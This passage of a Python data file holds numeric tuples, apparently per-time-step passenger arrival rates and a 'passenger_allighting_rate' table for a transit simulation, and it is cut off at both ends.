(3.612500194604662, 2.7209414519424455, 3.0063696248106235, 3.1617832322261963, 2.7683774319358765, 1.312236782503206, 1.163928739918464, 0.9933223760093212, 1.4224708199549485, 0.5755997929355963, 0.448592159357008, 0.26579530119080924, 0.0, 3.7076303341374848, 2.923748313098901, 2.2429607967850402, 1.7267993788067884, 2.844941639909897, 1.3906513264130496, 1.163928739918464, 0.93731198750229, 1.3841887159679382, 1.053927744075399, 0.6012739249621247, 0.24735831381294962, 0.0), # 124
(3.5997710731753836, 2.7072807192025174, 2.999608872795975, 3.1530161577620284, 2.7620638335352057, 1.309859428417623, 1.1589352361389478, 0.9914830800315152, 1.4203096970989324, 0.5736203165785135, 0.4471348411957002, 0.26501726083447835, 0.0, 3.6988551789279316, 2.9151898691792613, 2.235674205978501, 1.7208609497355403, 2.840619394197865, 1.3880763120441213, 1.1589352361389478, 0.9356138774411593, 1.3810319167676028, 1.0510053859206763, 0.599921774559195, 0.24611642901841072, 0.0), # 125
(3.5868528746891712, 2.6936519736498146, 2.9927780828939663, 3.1441760998350166, 2.755607645162638, 1.307482172910566, 1.153951534526854, 0.9896974276908488, 1.4181562287260556, 0.5716447688709844, 0.44568127418770764, 0.26423590384266454, 0.0, 3.6899066136030316, 2.9065949422693094, 2.2284063709385378, 1.7149343066129528, 2.8363124574521112, 1.3855763987671883, 1.153951534526854, 0.9339158377932613, 1.377803822581319, 1.0480586999450057, 0.5985556165787933, 0.2448774521499832, 0.0), # 126
(3.5737310528351447, 2.680033074863182, 2.9858641179961682, 3.13524716326347, 2.749000833816373, 1.305098575087432, 1.1489685407878187, 0.987957678953591, 1.416003841383254, 0.5696689639741025, 0.44422822514482535, 0.2634496978702106, 0.0, 3.6807725207274395, 2.897946676572316, 2.2211411257241265, 1.7090068919223071, 2.832007682766508, 1.3831407505350275, 1.1489685407878187, 0.9322132679195942, 1.3745004169081865, 1.0450823877544901, 0.5971728235992337, 0.2436393704421075, 0.0), # 127
(3.5603910613024183, 2.6664018824214697, 2.9788538409941503, 3.1262134528656995, 2.7422353664946106, 1.3027021940536203, 1.1439771606274765, 0.9862560937860104, 1.4138459616174646, 0.5676887160489614, 0.44277246087884836, 0.2626571105719597, 0.0, 3.671440782865815, 2.8892282162915555, 2.2138623043942416, 1.7030661481468838, 2.827691923234929, 1.3807585313004147, 1.1439771606274765, 0.9305015671811573, 1.3711176832473053, 1.0420711509552334, 0.5957707681988301, 0.24240017112922455, 0.0), # 128
(3.546818353780113, 2.652736255903522, 2.9717341147794802, 3.1170590734600148, 2.73530321019555, 1.300286588914529, 1.1389682997514627, 0.9845849321543767, 1.4116760159756234, 0.5656998392566547, 0.4413107482015715, 0.2618566096027546, 0.0, 3.6618992825828154, 2.8804227056303, 2.2065537410078573, 1.6970995177699637, 2.823352031951247, 1.3784189050161275, 1.1389682997514627, 0.9287761349389492, 1.367651605097775, 1.0390196911533385, 0.594346822955896, 0.24115784144577473, 0.0), # 129
(3.532998383957347, 2.6390140548881877, 2.9644918022437268, 3.107768129864726, 2.72819633191739, 1.2978453187755554, 1.1339328638654125, 0.9829364540249584, 1.4094874310046666, 0.5636981477582759, 0.4398398539247897, 0.2610466626174385, 0.0, 3.6521359024430993, 2.8715132887918227, 2.199199269623948, 1.6910944432748272, 2.818974862009333, 1.3761110356349417, 1.1339328638654125, 0.9270323705539681, 1.364098165958695, 1.0359227099549089, 0.5928983604487453, 0.2399103686261989, 0.0), # 130
(3.5189166055232377, 2.625213138954313, 2.9571137662784603, 3.098324726898143, 2.7209066986583315, 1.295371942742099, 1.1288617586749619, 0.9813029193640249, 1.4072736332515314, 0.5616794557149186, 0.43835654486029796, 0.2602257372708542, 0.0, 3.6421385250113247, 2.8624831099793955, 2.1917827243014893, 1.6850383671447555, 2.814547266503063, 1.373824087109635, 1.1288617586749619, 0.9252656733872135, 1.3604533493291657, 1.0327749089660478, 0.5914227532556922, 0.2386557399049376, 0.0), # 131
(3.504558472166904, 2.611311367680746, 2.9495868697752488, 3.0887129693785758, 2.7134262774165743, 1.2928600199195572, 1.123745889885745, 0.9796765881378455, 1.4050280492631537, 0.5596395772876765, 0.43685758781989104, 0.2593923012178448, 0.0, 3.6318950328521504, 2.853315313396292, 2.184287939099455, 1.6789187318630292, 2.8100560985263074, 1.3715472233929837, 1.123745889885745, 0.9234714427996837, 1.3567131387082871, 1.0295709897928589, 0.5899173739550498, 0.2373919425164315, 0.0), # 132
(3.4899094375774653, 2.5972866006463327, 2.9418979756256616, 3.0789169621243357, 2.705747035190316, 1.2903031094133288, 1.118576163203398, 0.9780497203126887, 1.40274410558647, 0.5575743266376434, 0.43533974961536415, 0.25854482211325314, 0.0, 3.6213933085302346, 2.843993043245784, 2.1766987480768205, 1.6727229799129297, 2.80548821117294, 1.3692696084377642, 1.118576163203398, 0.9216450781523777, 1.352873517595158, 1.0263056540414455, 0.5883795951251324, 0.2361169636951212, 0.0), # 133
(3.474954955444038, 2.583116697429922, 2.934033946721268, 3.068920809953731, 2.697860938977758, 1.287694770328812, 1.1133434843335557, 0.9764145758548239, 1.4004152287684173, 0.5554795179259124, 0.43379979705851196, 0.25768176761192224, 0.0, 3.6106212346102335, 2.8344994437311444, 2.1689989852925597, 1.6664385537777369, 2.8008304575368346, 1.3669804061967537, 1.1133434843335557, 0.9197819788062943, 1.348930469488879, 1.0229736033179107, 0.5868067893442537, 0.23482879067544749, 0.0), # 134
(3.4596804794557414, 2.5687795176103587, 2.9259816459536365, 3.058708617685074, 2.689759955777099, 1.285028561771405, 1.1080387589818537, 0.9747634147305201, 1.3980348453559306, 0.5533509653135777, 0.4322344969611296, 0.2568016053686951, 0.0, 3.599566693656808, 2.824817659055646, 2.1611724848056477, 1.660052895940733, 2.796069690711861, 1.3646687806227282, 1.1080387589818537, 0.917877544122432, 1.3448799778885494, 1.0195695392283581, 0.5851963291907273, 0.23352541069185084, 0.0), # 135
(3.444071463301694, 2.554252920766492, 2.9177279362143365, 3.0482644901366713, 2.681436052586538, 1.282298042846506, 1.102652892853927, 0.9730884969060463, 1.3955963818959474, 0.5511844829617324, 0.43064061613501187, 0.2559028030384148, 0.0, 3.5882175682346147, 2.814930833422562, 2.153203080675059, 1.6535534488851968, 2.7911927637918947, 1.362323895668465, 1.102652892853927, 0.9159271734617901, 1.340718026293269, 1.0160881633788907, 0.5835455872428673, 0.23220481097877202, 0.0), # 136
(3.4281133606710137, 2.5395147664771676, 2.9092596803949373, 3.0375725321268376, 2.6728811964042754, 1.279496772659513, 1.0971767916554112, 0.9713820823476715, 1.3930932649354042, 0.5489758850314703, 0.42901492139195374, 0.25498382827592403, 0.0, 3.5765617409083106, 2.804822111035164, 2.145074606959769, 1.6469276550944105, 2.7861865298708084, 1.3599349152867402, 1.0971767916554112, 0.9139262661853664, 1.3364405982021377, 1.0125241773756128, 0.5818519360789874, 0.23086497877065162, 0.0), # 137
(3.4117916252528193, 2.5245429143212332, 2.900563741387006, 3.0266168484738794, 2.6640873542285117, 1.2766183103158248, 1.0916013610919408, 0.9696364310216651, 1.3905189210212374, 0.5467209856838848, 0.4273541795437502, 0.254043148736066, 0.0, 3.5645870942425564, 2.794474636096725, 2.136770897718751, 1.640162957051654, 2.781037842042475, 1.3574910034303311, 1.0916013610919408, 0.9118702216541607, 1.3320436771142559, 1.0088722828246266, 0.5801127482774012, 0.22950390130193032, 0.0), # 138
(3.3950917107362275, 2.509315223877536, 2.8916269820821134, 3.015381543996108, 2.6550464930574442, 1.2736562149208395, 1.085917506869152, 0.9678438028942958, 1.387866776700383, 0.5444155990800699, 0.4256551574021961, 0.2530792320736836, 0.0, 3.5522815108020076, 2.7838715528105187, 2.1282757870109803, 1.6332467972402092, 2.775733553400766, 1.354981324052014, 1.085917506869152, 0.9097544392291711, 1.3275232465287221, 1.0051271813320362, 0.5783253964164228, 0.22811956580704876, 0.0), # 139
(3.3779990708103593, 2.4938095547249226, 2.882436265371829, 3.0038507235118335, 2.6457505798892744, 1.2706040455799552, 1.0801161346926793, 0.9659964579318328, 1.3851302585197776, 0.5420555393811187, 0.42391462177908634, 0.25209054594361974, 0.0, 3.539632873151326, 2.7729960053798166, 2.1195731088954313, 1.6261666181433558, 2.770260517039555, 1.352395041104566, 1.0801161346926793, 0.9075743182713966, 1.3228752899446372, 1.0012835745039448, 0.5764872530743659, 0.22670995952044753, 0.0), # 140
(3.3604991591643323, 2.478003766442241, 2.8729784541477206, 2.992008491839366, 2.636191581722201, 1.2674553613985702, 1.074188150268159, 0.9640866561005451, 1.3823027930263572, 0.5396366207481252, 0.422129339486216, 0.2510755580007175, 0.0, 3.5266290638551654, 2.761831138007892, 2.1106466974310796, 1.6189098622443754, 2.7646055860527143, 1.3497213185407633, 1.074188150268159, 0.9053252581418358, 1.3180957908611004, 0.9973361639464555, 0.5745956908295441, 0.2252730696765674, 0.0), # 141
(3.3425774294872626, 2.4618757186083373, 2.863240411301357, 2.9798389537970165, 2.626361465554423, 1.2642037214820832, 1.0681244593012253, 0.962106657366702, 1.3793778067670588, 0.5371546573421829, 0.4202960773353799, 0.25003273589981984, 0.0, 3.5132579654781866, 2.750360094898018, 2.101480386676899, 1.6114639720265485, 2.7587556135341176, 1.3469493203133829, 1.0681244593012253, 0.903002658201488, 1.3131807327772116, 0.9932796512656723, 0.5726480822602714, 0.2238068835098489, 0.0), # 142
(3.32421933546827, 2.4454032708020597, 2.8532089997243086, 2.9673262142030925, 2.616252198384141, 1.2608426849358916, 1.0619159674975138, 0.960048721696572, 1.3763487262888197, 0.5346054633243854, 0.4184116021383729, 0.2489605472957697, 0.0, 3.499507460585047, 2.738566020253466, 2.0920580106918645, 1.603816389973156, 2.7526974525776393, 1.3440682103752009, 1.0619159674975138, 0.9006019178113511, 1.3081260991920705, 0.9891087380676977, 0.5706417999448617, 0.22230938825473273, 0.0), # 143
(3.305410330796474, 2.4285642826022547, 2.8428710823081427, 2.954454377875907, 2.6058557472095543, 1.2573658108653942, 1.0555535805626597, 0.9579051090564249, 1.3732089781385746, 0.5319848528558261, 0.4164726807069901, 0.24785745984341, 0.0, 3.485365431740406, 2.7264320582775095, 2.0823634035349503, 1.595954558567478, 2.746417956277149, 1.3410671526789948, 1.0555535805626597, 0.8981184363324245, 1.3029278736047771, 0.9848181259586359, 0.5685742164616286, 0.22077857114565957, 0.0), # 144
(3.286135869160991, 2.41133661358777, 2.8322135219444298, 2.9412075496337686, 2.595164079028862, 1.2537666583759894, 1.0490282042022987, 0.9556680794125294, 1.3699519888632605, 0.5292886400975989, 0.41447607985302637, 0.24672194119758384, 0.0, 3.47081976150892, 2.7139413531734218, 2.072380399265132, 1.5878659202927965, 2.739903977726521, 1.3379353111775412, 1.0490282042022987, 0.8955476131257067, 1.297582039514431, 0.9804025165445898, 0.566442704388886, 0.21921241941707004, 0.0), # 145
(3.2663814042509403, 2.393698123337452, 2.821223181524739, 2.927569834294988, 2.584169160840265, 1.2500387865730758, 1.042330744122066, 0.9533298927311545, 1.3665711850098141, 0.5265126392107972, 0.4124185663882766, 0.24555245901313405, 0.0, 3.4558583324552474, 2.701077049144474, 2.062092831941383, 1.5795379176323912, 2.7331423700196282, 1.3346618498236165, 1.042330744122066, 0.8928848475521969, 1.2920845804201324, 0.9758566114316628, 0.5642446363049479, 0.21760892030340476, 0.0), # 146
(3.24613238975544, 2.375626671430148, 2.8098869239406365, 2.913525336677874, 2.5728629596419603, 1.2461757545620502, 1.0354521060275963, 0.9508828089785692, 1.3630599931251721, 0.5236526643565147, 0.4102969071245358, 0.24434748094490372, 0.0, 3.4404690271440472, 2.6878222903939406, 2.051484535622679, 1.5709579930695439, 2.7261199862503442, 1.331235932569997, 1.0354521060275963, 0.8901255389728929, 1.2864314798209802, 0.9711751122259582, 0.5619773847881274, 0.21596606103910437, 0.0), # 147
(3.2253742793636087, 2.3571001174447055, 2.7981916120836945, 2.899058161600739, 2.56123744243215, 1.2421711214483127, 1.0283831956245253, 0.9483190881210429, 1.3594118397562704, 0.5207045296958448, 0.4081078688735989, 0.24310547464773571, 0.0, 3.4246397281399767, 2.6741602211250926, 2.0405393443679944, 1.562113589087534, 2.718823679512541, 1.3276467233694602, 1.0283831956245253, 0.8872650867487947, 1.280618721216075, 0.9663527205335799, 0.5596383224167389, 0.21428182885860964, 0.0), # 148
(3.204092526764565, 2.338096320959971, 2.7861241088454816, 2.884152413881891, 2.549284576209032, 1.2380184463372599, 1.0211149186184882, 0.9456309901248444, 1.355620151450045, 0.5176640493898814, 0.40584821844726066, 0.24182490777647309, 0.0, 3.408358318007695, 2.6600739855412034, 2.0292410922363033, 1.5529921481696438, 2.71124030290009, 1.3238833861747823, 1.0211149186184882, 0.8842988902408999, 1.274642288104516, 0.9613841379606305, 0.5572248217690964, 0.21255421099636107, 0.0), # 149
(3.182272585647426, 2.3185931415547922, 2.773671277117565, 2.8687921983396416, 2.5369963279708068, 1.2337112883342916, 1.0136381807151202, 0.9428107749562428, 1.3516783547534337, 0.5145270375997177, 0.40351472265731625, 0.24050424798595882, 0.0, 3.3916126793118586, 2.6455467278455465, 2.017573613286581, 1.5435811127991528, 2.7033567095068674, 1.31993508493874, 1.0136381807151202, 0.8812223488102082, 1.2684981639854034, 0.956264066113214, 0.5547342554235131, 0.21078119468679934, 0.0), # 150
(3.15989990970131, 2.2985684388080165, 2.7608199797915143, 2.852961619792299, 2.524364664715674, 1.2292432065448047, 1.0059438876200566, 0.9398507025815073, 1.347579876213372, 0.5112893084864479, 0.40110414831556035, 0.23914196293103576, 0.0, 3.3743906946171274, 2.630561592241393, 2.0055207415778016, 1.5338679254593435, 2.695159752426744, 1.3157909836141102, 1.0059438876200566, 0.8780308618177176, 1.262182332357837, 0.9509872065974332, 0.5521639959583029, 0.20896076716436518, 0.0), # 151
(3.1369599526153373, 2.27800007229849, 2.747557079758901, 2.836644783058176, 2.5113815534418316, 1.2246077600741982, 0.998022945038933, 0.9367430329669069, 1.343318142376796, 0.5079466762111651, 0.3986132622337882, 0.237736520266547, 0.0, 3.356680246488159, 2.6151017229320166, 1.9930663111689406, 1.523840028633495, 2.686636284753592, 1.3114402461536696, 0.998022945038933, 0.8747198286244273, 1.2556907767209158, 0.9455482610193922, 0.5495114159517802, 0.2070909156634991, 0.0), # 152
(3.1134381680786243, 2.2568659016050607, 2.7338694399112895, 2.81982579295558, 2.4980389611474814, 1.2197985080278704, 0.9898662586773839, 0.9334800260787104, 1.338886579790643, 0.504494954934963, 0.39603883122379446, 0.2362863876473355, 0.0, 3.338469217489611, 2.59915026412069, 1.9801941561189722, 1.5134848648048886, 2.677773159581286, 1.3068720365101947, 0.9898662586773839, 0.871284648591336, 1.2490194805737407, 0.9399419309851935, 0.546773887982258, 0.20516962741864192, 0.0), # 153
(3.0893200097802915, 2.2351437863065757, 2.719743923140253, 2.802488754302823, 2.4843288548308213, 1.2148090095112194, 0.9814647342410456, 0.9300539418831871, 1.3342786150018489, 0.5009299588189354, 0.3933776220973742, 0.2347900327282442, 0.0, 3.319745490186143, 2.5826903600106856, 1.9668881104868707, 1.502789876456806, 2.6685572300036977, 1.302075518636462, 0.9814647342410456, 0.8677207210794424, 1.2421644274154107, 0.9341629181009412, 0.5439487846280506, 0.20319488966423419, 0.0), # 154
(3.0645909314094544, 2.212811585981881, 2.705167392337359, 2.7846177719182137, 2.470243201490052, 1.2096328236296434, 0.9728092774355522, 0.926457040346606, 1.3294876745573503, 0.49724750202417556, 0.39062640166632223, 0.2332459231641161, 0.0, 3.3004969471424106, 2.565705154805277, 1.953132008331611, 1.4917425060725265, 2.6589753491147006, 1.2970398564852486, 0.9728092774355522, 0.8640234454497453, 1.235121600745026, 0.928205923972738, 0.5410334784674719, 0.2011646896347165, 0.0), # 155
(3.0392363866552325, 2.1898471602098257, 2.6901267103941757, 2.7661969506200625, 2.455773968123373, 1.204263509488541, 0.96389079396654, 0.9226815814352365, 1.3245071850040835, 0.4934433987117774, 0.38778193674243366, 0.23165252660979413, 0.0, 3.280711470923074, 2.548177792707735, 1.9389096837121682, 1.480330196135332, 2.649014370008167, 1.2917542140093312, 0.96389079396654, 0.8601882210632436, 1.2278869840616864, 0.9220656502066877, 0.5380253420788351, 0.19907701456452961, 0.0), # 156
(3.013241829206745, 2.1662283685692554, 2.674608740202273, 2.7472103952266815, 2.4409131217289826, 1.19869462619331, 0.9547001895396439, 0.9187198251153471, 1.319330572888985, 0.4895134630428343, 0.38484099413750333, 0.2300083107201213, 0.0, 3.2603769440927906, 2.5300914179213336, 1.9242049706875164, 1.4685403891285025, 2.63866114577797, 1.2862077551614859, 0.9547001895396439, 0.8562104472809356, 1.2204565608644913, 0.915736798408894, 0.5349217480404546, 0.19692985168811414, 0.0), # 157
(2.985872378562096, 2.141499477616495, 2.6578639846341185, 2.7269308744953733, 2.424981628232266, 1.1925723778073256, 0.9450213441855715, 0.9142994920582287, 1.3135549455465463, 0.48533659162911447, 0.38170638350259617, 0.22825331880647803, 0.0, 3.238594343766138, 2.510786506871258, 1.908531917512981, 1.456009774887343, 2.6271098910930926, 1.2800192888815203, 0.9450213441855715, 0.8518374127195183, 1.212490814116133, 0.9089769581651246, 0.5315727969268238, 0.19468177069240863, 0.0), # 158
(2.9529147067913613, 2.1131239505198085, 2.635579272800996, 2.7011931476365363, 2.4040510159417674, 1.1838609178683244, 0.9336425526771432, 0.9078689221273971, 1.3048569681629525, 0.48022809940987465, 0.37782779570793296, 0.22604541745610365, 0.0, 3.210171058768078, 2.48649959201714, 1.8891389785396648, 1.4406842982296237, 2.609713936325905, 1.271016490978356, 0.9336425526771432, 0.8456149413345173, 1.2020255079708837, 0.9003977158788457, 0.5271158545601993, 0.1921021773199826, 0.0), # 159
(2.913948837961724, 2.0808688004649283, 2.6073069859852964, 2.669573253122658, 2.3777120350258123, 1.1723463024111265, 0.9204487496767568, 0.8992665315878912, 1.2929900302971533, 0.4741205651862895, 0.3731506339073027, 0.22335006496292825, 0.0, 3.1745682435574323, 2.4568507145922105, 1.8657531695365135, 1.422361695558868, 2.5859800605943066, 1.2589731442230476, 0.9204487496767568, 0.8373902160079474, 1.1888560175129061, 0.8898577510408863, 0.5214613971970593, 0.18916989095135714, 0.0), # 160
(2.869288821834384, 2.0449443182961717, 2.5733489906367697, 2.6323717511270184, 2.34623816647523, 1.1581680230330733, 0.9055362892013753, 0.8886000888516301, 1.278110635599869, 0.4670658193170939, 0.3677161103066472, 0.22019224896358572, 0.0, 3.132149617927639, 2.4221147385994426, 1.8385805515332359, 1.4011974579512814, 2.556221271199738, 1.2440401243922823, 0.9055362892013753, 0.8272628735950524, 1.173119083237615, 0.877457250375673, 0.514669798127354, 0.18590402893601563, 0.0), # 161
(2.8192487081705426, 2.005560794857854, 2.5340071532051653, 2.5898892018228983, 2.3099028912808546, 1.1414655713315065, 0.8890015252679618, 0.8759773623305338, 1.2603752877218182, 0.45911569216102327, 0.3615654371119081, 0.21659695709470983, 0.0, 3.0832789016721334, 2.382566528041808, 1.8078271855595405, 1.3773470764830695, 2.5207505754436363, 1.2263683072627474, 0.8890015252679618, 0.815332550951076, 1.1549514456404273, 0.8632964006076329, 0.5068014306410331, 0.18232370862344133, 0.0), # 162
(2.7641425467313994, 1.9629285209942922, 2.4895833401402343, 2.5424261653835805, 2.268979690433517, 1.122378438903767, 0.8709408118934802, 0.8615061204365209, 1.2399404903137208, 0.4503220140768126, 0.35473982652902725, 0.21258917699293448, 0.0, 3.0283198145843517, 2.338480946922279, 1.7736991326451361, 1.3509660422304375, 2.4798809806274416, 1.2061085686111293, 0.8709408118934802, 0.8016988849312622, 1.1344898452167584, 0.8474753884611936, 0.4979166680280469, 0.1784480473631175, 0.0), # 163
(2.704284387278154, 1.917257787549801, 2.4403794178917257, 2.4902832019823453, 2.2237420449240504, 1.1010461173471968, 0.8514505030948932, 0.8452941315815116, 1.2169627470262965, 0.440736615423197, 0.34728049076394646, 0.20819389629489346, 0.0, 2.9676360764577314, 2.290132859243828, 1.736402453819732, 1.3222098462695906, 2.433925494052593, 1.1834117842141163, 0.8514505030948932, 0.7864615123908549, 1.1118710224620252, 0.830094400660782, 0.4880758835783452, 0.17429616250452737, 0.0), # 164
(2.639988279572007, 1.8687588853686983, 2.3866972529093897, 2.433760871792476, 2.174463435743286, 1.077608098259137, 0.8306269528891644, 0.8274491641774244, 1.191598561510264, 0.43041132655891146, 0.3392286420226075, 0.2034361026372207, 0.0, 2.901591407085708, 2.237797129009427, 1.6961432101130374, 1.291233979676734, 2.383197123020528, 1.1584288298483942, 0.8306269528891644, 0.7697200701850978, 1.087231717871643, 0.8112536239308255, 0.477339450581878, 0.16988717139715442, 0.0), # 165
(2.571568273374159, 1.8176421052952998, 2.3288387116429763, 2.3731597349872504, 2.121417343882057, 1.0522038732369288, 0.8085665152932573, 0.8080789866361796, 1.164004437416343, 0.41939797784269134, 0.330625492510952, 0.19834078365655008, 0.0, 2.830549526261718, 2.1817486202220504, 1.6531274625547598, 1.2581939335280736, 2.328008874832686, 1.1313105812906514, 0.8085665152932573, 0.7515741951692348, 1.0607086719410286, 0.7910532449957504, 0.4657677423285953, 0.16524019139048182, 0.0), # 166
(2.4993384184458094, 1.764117738173922, 2.267105660542235, 2.308780351739953, 2.0648772503311945, 1.0249729338779137, 0.785365544324135, 0.7872913673696962, 1.1343368783952532, 0.40774839963327153, 0.3215122544349219, 0.1929329269895153, 0.0, 2.7548741537791983, 2.122262196884668, 1.607561272174609, 1.2232451988998143, 2.2686737567905064, 1.1022079143175747, 0.785365544324135, 0.7321235241985098, 1.0324386251655973, 0.7695934505799846, 0.45342113210844703, 0.16037433983399293, 0.0), # 167
(2.4236127645481584, 1.7083960748488805, 2.201799966056916, 2.240923282223864, 2.005116636081531, 0.9960547717794331, 0.7611203939987609, 0.7651940747898933, 1.102752388097714, 0.3955144222893873, 0.31193014000045877, 0.1872375202727504, 0.0, 2.674929009431585, 2.0596127230002543, 1.5596507000022939, 1.1865432668681617, 2.205504776195428, 1.0712717047058506, 0.7611203939987609, 0.7114676941281666, 1.0025583180407656, 0.7469744274079547, 0.4403599932113833, 0.15530873407717097, 0.0), # 168
(2.344705361442406, 1.6506874061644923, 2.13322349463677, 2.169889086612265, 1.9424089821238986, 0.9655888785388289, 0.7359274183340984, 0.7418948773086909, 1.0694074701744452, 0.3827478761697738, 0.3019203614135046, 0.1812795511428891, 0.0, 2.591077813012314, 1.9940750625717798, 1.509601807067523, 1.148243628509321, 2.1388149403488903, 1.0386528282321672, 0.7359274183340984, 0.6897063418134491, 0.9712044910619493, 0.7232963622040884, 0.426644698927354, 0.15006249146949932, 0.0), # 169
(2.2629302588897535, 1.5912020229650736, 2.061678112731545, 2.095978325078436, 1.8770277694491289, 0.9337147457534416, 0.7098829713471106, 0.717501543338008, 1.0344586282761652, 0.36950059163316584, 0.2915241308800011, 0.1750840072365653, 0.0, 2.503684284314822, 1.9259240796022181, 1.4576206544000057, 1.1085017748994974, 2.0689172565523304, 1.0045021606732112, 0.7098829713471106, 0.6669391041096011, 0.9385138847245644, 0.6986594416928121, 0.412335622546309, 0.14465472936046128, 0.0), # 170
(2.1786015066514, 1.53015021609494, 1.9874656867909928, 2.0194915577956607, 1.809246479048055, 0.900571865020613, 0.6830834070547611, 0.6921218412897638, 0.9980623660535942, 0.35582439903829893, 0.2807826606058899, 0.16867587619041288, 0.0, 2.413112143132546, 1.8554346380945415, 1.4039133030294495, 1.0674731971148965, 1.9961247321071884, 0.9689705778056694, 0.6830834070547611, 0.6432656178718664, 0.9046232395240275, 0.6731638525985537, 0.3974931373581986, 0.13910456509954003, 0.0), # 171
(2.092033154488546, 1.4677422763984087, 1.9108880832648623, 1.940729344937219, 1.7393385919115076, 0.8662997279376846, 0.6556250794740132, 0.6658635395758785, 0.9603751871574514, 0.3417711287439081, 0.26973716279711296, 0.16208014564106574, 0.0, 2.3197251092589215, 1.7828816020517226, 1.3486858139855649, 1.025313386231724, 1.9207503743149028, 0.9322089554062299, 0.6556250794740132, 0.618785519955489, 0.8696692959557538, 0.6469097816457398, 0.3821776166529725, 0.13343111603621902, 0.0), # 172
(2.003539252162392, 1.4041884947197956, 1.832247168602904, 1.8599922466763927, 1.6675775890303204, 0.8310378261019976, 0.62760434262183, 0.6388344066082706, 0.9215535952384564, 0.32739261110872825, 0.25842884965961194, 0.1553218032251575, 0.0, 2.223886902487385, 1.7085398354767325, 1.2921442482980594, 0.9821778333261846, 1.8431071904769127, 0.8943681692515789, 0.62760434262183, 0.5935984472157125, 0.8337887945151602, 0.6199974155587977, 0.36644943372058086, 0.12765349951998142, 0.0), # 173
(1.9134338494341376, 1.3396991619034166, 1.7518448092548675, 1.7775808231864623, 1.5942369513953243, 0.7949256511108933, 0.5991175505151751, 0.6111422107988601, 0.8817540939473285, 0.31274067649149473, 0.24689893339932856, 0.1484258365793223, 0.0, 2.1259612426113734, 1.632684202372545, 1.2344946669966426, 0.9382220294744841, 1.763508187894657, 0.8555990951184042, 0.5991175505151751, 0.5678040365077809, 0.7971184756976621, 0.5925269410621542, 0.3503689618509735, 0.12179083290031062, 0.0), # 174
(1.8220309960649823, 1.274484568793588, 1.6699828716705027, 1.6937956346407104, 1.5195901599973516, 0.7581026945617134, 0.5702610571710116, 0.582894720559566, 0.8411331869347874, 0.2978671552509425, 0.23518862622220466, 0.14141723334019382, 0.0, 2.026311849424323, 1.5555895667421318, 1.1759431311110233, 0.8936014657528273, 1.682266373869575, 0.8160526087833925, 0.5702610571710116, 0.5415019246869381, 0.7597950799986758, 0.5645985448802369, 0.33399657433410057, 0.11586223352668984, 0.0), # 175
(1.7296447418161276, 1.2087550062346268, 1.5869632222995596, 1.6089372412124177, 1.4439106958272347, 0.720708448051799, 0.541131216606303, 0.5541997043023082, 0.7998473778515522, 0.28282387774580675, 0.22333914033418203, 0.134320981144406, 0.0, 1.9253024427196697, 1.4775307925884658, 1.11669570167091, 0.84847163323742, 1.5996947557031045, 0.7758795860232315, 0.541131216606303, 0.5147917486084279, 0.7219553479136174, 0.5363124137374726, 0.31739264445991194, 0.10988681874860246, 0.0), # 176
(1.636589136448773, 1.1427207650708489, 1.503087727591788, 1.5233062030748648, 1.3674720398758062, 0.6828824031784915, 0.5118243828380126, 0.5251649304390055, 0.7580531703483426, 0.2676626743348225, 0.21139168794120244, 0.12716206762859264, 0.0, 1.82329674229085, 1.3987827439145188, 1.056958439706012, 0.8029880230044673, 1.5161063406966853, 0.7352309026146077, 0.5118243828380126, 0.48777314512749387, 0.6837360199379031, 0.5077687343582884, 0.3006175455183576, 0.10388370591553173, 0.0), # 177
(1.5431782297241188, 1.0765921361465705, 1.4186582539969381, 1.437203080401335, 1.290547673133897, 0.6447640515391326, 0.4824369098831035, 0.4958981673815776, 0.715907068075878, 0.25243537537672506, 0.19938748124920752, 0.1199654804293876, 0.0, 1.7206584679313008, 1.3196202847232632, 0.9969374062460375, 0.757306126130175, 1.431814136151756, 0.6942574343342086, 0.4824369098831035, 0.46054575109938045, 0.6452738365669485, 0.47906769346711175, 0.2837316507993876, 0.09787201237696096, 0.0), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_allighting_rate = (
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 0
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 1
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 2
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 3
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 4
